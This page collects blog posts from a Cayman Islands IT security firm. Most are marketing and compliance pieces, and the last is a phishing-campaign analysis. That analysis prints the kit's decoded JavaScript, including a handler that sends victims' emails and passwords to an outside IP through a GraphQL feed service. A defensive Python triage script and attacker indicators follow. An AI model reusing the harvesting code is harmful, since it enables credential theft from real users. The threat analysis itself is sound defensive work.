3 November 2021

Microsoft 365 Defender Named Forrester Leader for XDR, Q4 2021




Earlier this week, Microsoft announced they were named a Leader in The Forrester New Wave™: Extended Detection and Response (XDR) category for Q4 of 2021 for Microsoft 365 Defender. XDR (Extended Detection and Response) tools have seemingly popped up everywhere as the latest tool to give organisations real-time insight into cyber threats. In an already saturated market for XDR and security tools alike, Microsoft has done well to mature their offering, as evidenced by taking a different approach: an XDR tool needs not only to identify threats effectively but also to provide enough data for cybersecurity experts to manage those threats effectively.

A powerful security tool…

At Kirk ISS, we’ve found the Microsoft 365 Defender suite performs excellently when paired with deeper licensing. The more cybersecurity-centric licences, such as Microsoft 365 Business Premium, Enterprise Mobility Security + E5, and Defender for Endpoint, provide enriched data that feeds into Microsoft 365 Defender. When this data is presented in a single pane of glass to our cybersecurity analysts, threats can be identified and mitigated earlier in the cyber kill chain with less impact on customers.

So, what does this mean for your company?

The good news is that if you are already utilising portions of the Microsoft stack in your day-to-day operations, Microsoft 365 Defender is already working hard to keep your data secure. However, it really shines by aggregating data effectively across all aspects of an organisation, so that seasoned cybersecurity experts can identify threats quickly. Our SOCaaS, the only on-island Security Operations Center in the Cayman Islands, is powered by Azure Sentinel, a natural extension to the award-winning XDR tool. To learn more about how our SOCaaS can leverage Microsoft 365 Defender to secure your organisation, reach out to Kirk ISS today.

12 October 2021

Cybersecurity Best Practices: Quick Wins for Organisations




In light of the rapid change from corporate offices to remote workforces, organisations have been forced to focus on cybersecurity more than ever. Developing a robust cybersecurity framework that cascades throughout the business is paramount to ensuring the remote workforces are as protected as their office counterparts. For most organisations, the cybersecurity foundation starts with simple, yet sensible data protection policies and rules that are consistently enforced. Several examples of easy ways to bolster your organisation’s cybersecurity framework include:

Develop Formal IT Policies and Procedures

Almost every industry has some form of regulatory guidance for organisations to adhere to. Financially regulated entities have items like CIMA’s Statement of Guidance, vendors and retailers must adhere to the Payment Card Industry (PCI) standards, and every organisation needs to be aware of the EU’s General Data Protection Regulation (GDPR). Creating formal IT policies and procedures goes beyond rules for employees to follow when using their work computers – it creates a foundation for how the organisation operates should it need to recover from a disaster or plan for business continuity, how it manages its third-party affiliates and vendors, and how it plans to respond to cybersecurity threats and incidents.

Train Cyber Ninja Employees

*In 2021, nearly 85% of data breaches involved some form of human element to gain entry into a network. Training your staff to identify threats is key to preventing a cybersecurity incident from occurring. The best training doesn’t happen in a vacuum – the cyber threat landscape evolves constantly, requiring at least annual refreshers for employees to be set up for success. Our cybersecurity team conducts regular End User Awareness Training, along with simulated Social Engineering Assessments, to proactively identify areas to strengthen.

Tighten Cloud-Based Platforms

Work from home is rapidly evolving into work from anywhere. With BYOD becoming the norm for more and more organisations, it’s important to employ effective mobile access policies. Spending time reviewing the controls in cloud-based platforms such as Microsoft Azure and Office 365 will help define security baselines that ensure resources are protected no matter where they are stored. Such controls should include the use of Multi-Factor Authentication (MFA), password managers, Conditional Access policies, compliance and configuration baselines, remote management of devices, and identity protection for users and corporate resources alike. Kirk ISS regularly reviews customer baselines during our Infrastructure Audits to uncover gaps in configurations, helping strengthen their cybersecurity posture.

Think Like an Adversary

Regardless of whether you believe that “offense wins games, but defense wins championships”, the truth is there are more attackers than there are defenders in the cybersecurity workforce. *Gartner reports that in 2019, there was a deficit of nearly 65% between roles waiting to be filled and the talent pool of cybersecurity professionals. What does this mean for you? Small to medium businesses may not have the budget or the need for a fully-fledged cybersecurity team to proactively monitor, identify, and respond to threats as large organisations do, but the need for that capability is there. Kirk ISS has developed a SOC as a Service (SOCaaS) to provide a budget-friendly, cost-effective method of proactive cyber threat monitoring. In addition, assessments like Network Security Assessments have our cybersecurity professionals simulate hacking activities to uncover vulnerabilities before they can be exploited by the real bad guys.

Balancing Security with Productivity

Cybersecurity has become ubiquitous with the current state of remote work and will continue to be a dominant concern. CIOs and IT managers will need to strike a balance between driving productivity and the very real need to protect data from an ever-evolving threat landscape. Fortunately, our team of cybersecurity experts can assist if you need help deploying any of these best practices to protect your IT systems.

Some of the cybersecurity services we offer:

• Security Operations Centre as a Service (SOCaaS)
• Network Security Assessments/Penetration Testing
• Social Engineering Assessments
• Policy Creation
• End User Awareness Training
• Infrastructure Audits

* 2021 Verizon DBIR (https://enterprise.verizon.com/resources/reports/2021-data-breach-investigations-report.pdf)
* https://www.gartner.com/en/human-resources/research/talentneuron/labor-market-trends/cybersecurity-labor-shortage-and-covid-19

14 September 2021

CIMA Statement of Guidance and You: How to Navigate New Regulations




In May of 2020, CIMA released a statement of guidance discussing specific requirements for regulated entities within the cybersecurity space. In the guidance, CIMA issued recommendations based on other recent regulations, such as Cayman’s Data Protection Law and the now commonplace GDPR. In this statement of guidance, CIMA placed the responsibility of identifying, monitoring, and preventing cyber threats onto the shoulders of regulated entities. In addition to these requirements, CIMA also laid the groundwork for organisations to identify gaps within their risk profile, as well as take a deeper look into what vendors are being used.

A quick overview of the new requirements is listed below:

  • Cybersecurity threat monitoring and prevention
  • Risk assessment
  • Penetration testing
  • Policy creation and implementation, including:
    • Vendor Due Diligence
    • Business Continuity Planning
    • Incident Response
    • Breach Notifications

These threats are always present, and the attackers using these techniques keep changing their methods to evade security controls. While this may seem daunting to smaller organisations or those that have never had to think about these threats before, now is a good time to begin. There are several solutions out there, including those provided by Kirk ISS, that can help with not only regulatory satisfaction but also peace of mind.

Cybersecurity Threat Monitoring and Prevention

Kirk ISS has introduced SOC as a Service (SOCaaS) to customers in Cayman and throughout the Caribbean. SOCaaS provides organisations a cost-effective option for supplementing their IT environment with cybersecurity professionals who provide 24×7 support. SOCaaS utilises a “bring your own licensing” scheme that builds on what your organisation already has in place and can help shine a light on gaps in your security posture. SOCaaS also natively connects with Microsoft products, allowing Kirk ISS to proactively monitor and mitigate threats across your organisation, including email, identity management, Azure, Office 365, endpoints, and more. Analytics rules are deployed that identify threats such as phishing, brute-forcing attempts, malware, data leakage, and more. More information about the Kirk ISS SOCaaS can be found here.

Penetration Testing

Penetration testing is a proactive assessment in which cybersecurity professionals identify security vulnerabilities within an organisation in an effort to mitigate threats before attackers can exploit them. Kirk ISS’ cybersecurity engineers have years of experience performing penetration tests against organisations’ internal and external infrastructure and web applications, along with boutique testing scenarios.
Our Network Security Assessment (NSA) combines both traditional penetration testing and a vulnerability assessment to identify threats and misconfigurations within your organisation. This approach is designed to provide granularity into not only the underlying vulnerabilities but also how they affect your overall security posture. More information about the Kirk ISS Network Security Assessment can be found here.

Policy Creation

Written policies are the backbone of a successful information security program. Each organisation is different in the way they operate, deploy IT systems, and require each user to interact with internal resources. Without this baseline to refer to, an organisation is fighting uphill to define proper procedures and methodologies.
With years of experience working in cyber risk and threat management, Kirk ISS works with key stakeholders to help develop internal IT policies and procedures unique to your organisation. With CIMA’s Statement of Guidance as a baseline, we can develop mature IT policies to help make regulatory compliance much easier and help mold your organisation’s IT posture.

To learn more about where your organisation’s IT maturity lies compared to CIMA’s Statement of Guidance, contact Kirk ISS at 345-623-4730 or security@kirkiss.ky.

12 July 2021

Kirk ISS Named 2021 Microsoft Country Partner of the Year for the Cayman Islands




GEORGE TOWN, Grand Cayman, Cayman Islands — July 12, 2021 — Kirk ISS today announced it has won the Cayman Islands 2021 Microsoft Partner of the Year Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.

According to Kirk Office Managing Director Geoffrey Cuff, this year’s award is particularly special: “We’re thrilled to be recognized as the 2021 Microsoft Partner of the Year for the Cayman Islands. Over the last 12 months, our IT division at Kirk ISS has helped businesses overcome unprecedented challenges using Microsoft powered solutions, particularly in the cybersecurity space. Whether we are securing sensitive data or enabling remote working, our focus at Kirk ISS is always on helping businesses leverage technology to achieve more for their stakeholders. We’re incredibly proud to be recognized by a global technology leader like Microsoft for delivering the very best in cutting-edge cybersecurity solutions.”

The Microsoft Partner of the Year Awards recognize Microsoft partners that have developed and delivered outstanding Microsoft-based solutions during the past year. Awards were classified in various categories, with honorees chosen from a set of more than 4,400 submitted nominations from more than 100 countries worldwide. Kirk ISS was recognized for providing outstanding solutions and services in the Cayman Islands.

The Microsoft Country Partner of the Year Award recognizes one winning Microsoft partner per country for excellence in the delivery of Microsoft solutions and advancement of the company’s mission to empower every person and every organization on the planet to achieve more.

“I am honored to announce the winners and finalists of the 2021 Microsoft Partner of the Year Awards,” said Rodney Clark, corporate vice president, Global Partner Solutions, Channel Sales and Channel Chief, Microsoft. “These remarkable partners have displayed a deep commitment to building world-class solutions for customers—from cloud-to-edge—and represent some of the best and brightest our ecosystem has to offer.”

28 January 2021

Gone Phishing: A Deep Dive Into Phishing Campaigns




Kirk ISS Cybersecurity Post

Overview

Earlier this week, we uncovered a somewhat complex phishing campaign that passed VirusTotal and Microsoft’s Automated Investigation and Response (AIR) as non-malicious. While the email itself was fairly innocuous (other than looking exactly like a phishing email and coming from a suspicious domain), the attachment it contained was what drew us in. Malicious attachments aren’t anything new, but this one contained thousands of lines of CSS and formatting to emulate an Outlook web login perfectly. In addition, it also had a massive block of Base64-encoded JavaScript that emulated a Microsoft login.

The result? A convincing phishing email designed to trick users into believing it is a legitimate page.

Deep Dive

The initial email targets email addresses found by scraping a website. In one case, an “info@domain” account was both sender and recipient, adding some level of legitimacy. In another, the “info@domain” address sent the email to a user whose address was also scraped online.

The email stated the user had received a meeting notification, attached as an HTML document. Once downloaded, the attachment served two functions:

  1. Create a convincing Outlook web login attempt, and
  2. Trigger embedded Base64 JavaScript to replicate a Microsoft login and steal credentials.

The attachment took extreme care to make the webpage appear as authentic as possible; the first several hundred lines contained CSS and animations used by Microsoft. Once opened, an alert stating “Network Connection Error” appears regardless of connectivity – this portion is hard-coded to show when using a browser other than Edge.

To get a better understanding of the attachment, we dove into the source code and decoded all Base64 components. Here’s what happens under the hood when the user clicks the “retry” button:

function start(){
    document.getElementById("mArea").style.opacity = 0;
    setTimeout(()=>{
        if(!isEdge() ){
            var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
            window.location.href =  toText(Base64.decode(nextHmtl))+ap;
        }
        else{
            document.write((Base64.decode(nextHmtl)));
        }
    },2500);
}

The nextHmtl variable is where the malicious JavaScript starts to take effect. Close to 6000 lines in length, only the last hundred or so are used for actually capturing credentials. The rest are spent pulling the appropriate resources from Microsoft’s servers to give the appearance of a legitimate login attempt, pre-populated with the recipient’s email address to provide additional “validity”.

Further investigation revealed that users were forced to enter their password multiple times after an “invalid password” prompt. This acted as a verification mechanism, confirming that the given credential set was legitimate. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification system for the attacker. In the last step, all information entered by the victim is sent to an RSS feed in AWS, indicative of a “sit back and wait” phishing attack.

Here’s a look into what is harvested from the victim and sent back to the attacker:


    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {\n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {\n    title\n    description\n    feedUrl\n    siteUrl\n    siteName\n    imageUrl\n    generator\n    items {\n      title\n      url\n      description\n      date\n      enclosure {\n        url\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);
                    }

                } else{
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });

This email was unusual in the effort spent emulating Microsoft’s own code to produce a look-alike login. By using the embedded and encoded script, it can run in the same browser tab and so appear as innocuous as possible. While it may seem odd that this much effort was put into creating the attachment and not into the actual delivery of the email, it suggests the kit was most likely purchased for use in private campaigns.
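As an added illustration from the defender's side (this is not code from the post or from Kirk ISS), the Python script below shows how an analyst could triage an HTML attachment of this kind offline: it pulls out every long Base64 run, decodes it layer by layer, and flags the traits seen in this sample (a decoded payload written into the page with document.write, Microsoft-style form IDs, a password field, and a POST to an off-site GraphQL endpoint). The sample HTML embedded in it is constructed for the demonstration, and the indicator names are my own.

```python
import base64
import binascii
import re

# Constructed sample, not the real attachment: an outer page whose "retry"
# handler decodes a Base64 blob (nextHmtl) into a second page that posts the
# entered credentials to an off-site GraphQL endpoint.
INNER_HTML = """<form id="i0281"><input id="firstem"><input id="secondpw" type="password"></form>
<script>$.ajax({url:'https://rss.app/graphql',method:'post'});</script>"""
OUTER_HTML = (
    '<html><script>var nextHmtl="'
    + base64.b64encode(INNER_HTML.encode()).decode()
    + '";function start(){document.write(Base64.decode(nextHmtl));}</script></html>'
)

# Any run of 40+ Base64 alphabet characters is a candidate embedded payload.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators drawn from the sample discussed in the post (names are mine).
INDICATORS = {
    "decoded_document_write": re.compile(r"document\.write\(\s*\(?\s*Base64\.decode", re.I),
    "password_field": re.compile(r"""type=["']password["']""", re.I),
    "external_post": re.compile(r"""https?://[^\s"']+/graphql|\$\.ajax\(""", re.I),
    "ms_login_ids": re.compile(r"""id=["'](i0281|idSIButton10|idBtn_Back)["']"""),
}


def decode_blobs(text, depth=0, max_depth=3):
    """Yield (layer, decoded_text) for each Base64 run that decodes to text, recursing into it."""
    if depth >= max_depth:
        return
    for m in B64_RE.finditer(text):
        blob = m.group(0).rstrip("=")
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except binascii.Error:
            continue
        # Skip blobs that decode to binary rather than markup or script.
        textual = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / len(raw)
        if textual < 0.9:
            continue
        decoded = raw.decode("ascii", errors="ignore")
        yield depth + 1, decoded
        yield from decode_blobs(decoded, depth + 1, max_depth)


def analyse_attachment(html):
    """Return sorted (indicator, layer) pairs found in the page or any decoded layer."""
    hits = set()
    for layer, content in [(0, html)] + list(decode_blobs(html)):
        for name, rx in INDICATORS.items():
            if rx.search(content):
                hits.add((name, layer))
    return sorted(hits)


if __name__ == "__main__":
    for hit in analyse_attachment(OUTER_HTML):
        print(hit)
```

Layer 0 is the attachment as received, so a hit such as ("password_field", 1) means the trait only appears after decoding, which is itself a useful signal for a mail filter or SOC playbook.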

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125